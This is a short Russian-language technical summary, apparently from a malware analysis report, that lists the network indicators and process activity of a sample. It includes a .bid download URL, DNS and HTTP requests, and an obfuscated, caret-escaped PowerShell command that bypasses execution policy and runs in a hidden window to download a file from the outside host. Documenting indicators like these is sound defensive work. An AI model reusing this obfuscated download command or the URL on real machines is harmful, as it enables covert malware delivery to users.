Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^RSHel^L^.^exe -^EX^ec^U^T^Ion^P^olI^CY^ ^by^p^A^SS^ ^-N^O^PROF^i^lE^ -Wi^Nd^O^WSTyl^e^ hiDden (n^e^W^-^O^b^J^Ect^ ^sYSt^Em.nET^.^webclI^eNt).DOwnLOa^D^fI^LE(^'http://...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^RSHel^L^.^exe -^EX^ec^U^T^Ion^P^olI^CY^ ^by^p^A^SS^ ^-N^O^PROF^i^lE^ -Wi^Nd^O^WSTyl^e^ hiDden (n^e^W^-^O^b^J^Ect^ ^sYSt^Em.nET^.^webclI^eNt).DOwnLOa^D^fI^LE(^'http://...' (со скрытым окном)